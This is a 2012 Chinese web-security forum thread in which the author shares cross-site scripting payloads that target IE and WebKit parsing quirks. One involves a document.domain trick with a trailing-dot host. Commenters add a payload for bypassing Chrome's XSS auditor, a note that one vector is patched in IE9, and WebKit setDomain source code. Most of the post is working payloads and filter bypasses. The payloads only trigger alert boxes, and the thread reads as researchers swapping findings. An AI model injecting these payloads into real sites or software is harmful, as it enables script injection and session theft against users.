分享几个最近搞的XSS向量

<img src=`<body/onload=alert(1) />

IE在识别tag的时候必须有tag结束界定符,由于src只有属性界定符的原因,<img不被认为是一个tag,所以<body/onload=alert(1) />被解析了.

<!-- `<img/src=xx:xx onerror=alert(1)//--!>

IE,属性界定符在注释tag中可以打破>结束符,使用前面的注释tag失效.(具体原因我也不是很清楚)

<svg/onload=domain=id>

最共22字符,webkit系浏览器有效.

这里的domain=id相当与document.domain=”

正常情况下是无法执行的.

配合一个webkit的bug,在host后面加个点即可执行,不过官方并不认为这是一个bug.

范例:http://fiddle.jshell.net./KG7fR/5/show (从jsfiddle跨到jsbin)

1#xsser | 2012-05-26 22:18

赞这种分享!!!!

 

2#蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 22:57

好东西。。现在想问chrome怎么xss

 

3#Sogili (.) 长短短 (.) | 2012-05-26 23:05

@蟋蟀哥哥 你指的是绕过chrome的xss审查器吗?

 

4#Xhm1n9 | 2012-05-26 23:12

学习了:)

 

5#蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 23:46

@Sogili 是的。google防xss比较厉害,目前纯xss没有办法绕过。只有借助flash等第三方才可以进行绕过

 

6#Sogili (.) 长短短 (.) | 2012-05-26 23:56

@蟋蟀哥哥 <svg><script/xlink:href=data:,alert(1)></script>你试试

 

7#冷冷的夜 (1) | 2012-05-27 12:21

@Sogili 感谢分享

 

8#p.z | 2012-05-27 12:31

感谢分享!

 

9#gainover | 2012-05-27 13:07

<img src=`<body/onload=alert(1) />

反引号这个,在IE9里被修复了。 直接整个<img src=`<body/onload=alert(1) /> 都被当文本显示了。

 

10#CnCxzSec(衰仔) | 2012-05-27 13:54

感谢@Sogili 分享!

 

11#rayh4c | 2012-05-27 21:27

@Sogili http://code.google.com/p/chromium/issues/detail?id=103384 = = 跨域的这个还真奇葩~

 

12#Sogili (.) 长短短 (.) | 2012-05-27 22:54

@rayh4c

void Document::setDomain(const String& newDomain, ExceptionCode& ec)
{
if (SecurityOrigin::isDomainRelaxationForbiddenForURLScheme(securityOrigin()->protocol())) {
ec = SECURITY_ERR;
return;
}

// Both NS and IE specify that changing the domain is only allowed when
// the new domain is a suffix of the old domain.

// FIXME: We should add logging indicating why a domain was not allowed.

// If the new domain is the same as the old domain, still call
// securityOrigin()->setDomainForDOM. This will change the
// security check behavior. For example, if a page loaded on port 8000
// assigns its current domain using document.domain, the page will
// allow other pages loaded on different ports in the same domain that
// have also assigned to access this page.
if (equalIgnoringCase(domain(), newDomain)) {
securityOrigin()->setDomainFromDOM(newDomain);
if (m_frame)
m_frame->script()->updateSecurityOrigin();
return;
}

int oldLength = domain().length();
int newLength = newDomain.length();
// e.g. newDomain = webkit.org (10) and domain() = www.webkit.org (14)
if (newLength >= oldLength) {
ec = SECURITY_ERR;
return;
}

String test = domain();
// Check that it’s a subdomain, not e.g. “ebkit.org”
if (test[oldLength – newLength – 1] != ‘.’) {
ec = SECURITY_ERR;
return;
}

// Now test is “webkit.org” from domain()
// and we check that it’s the same thing as newDomain
test.remove(0, oldLength – newLength);
if (test != newDomain) {
ec = SECURITY_ERR;
return;
}

securityOrigin()->setDomainFromDOM(newDomain);
if (m_frame)
m_frame->script()->updateSecurityOrigin();
}
Adam Barth 08年发现了这个问题并报给了webkit,要求调用updateSecurityOrigin检测源(https://bugs.webkit.org/show_bug.cgi?id=22776).
但ScriptController的updateSecurityOrigi是一个空实现.

 

13#凤凰 (凤凰涅磐,浴火重生) | 2012-05-29 17:28

牛人!学习了

 

14#HuGtion | 2012-05-31 11:02

谢谢分享!

 

15#xsser_w (看个J8,SB!) | 2012-06-13 18:00

= =! niubility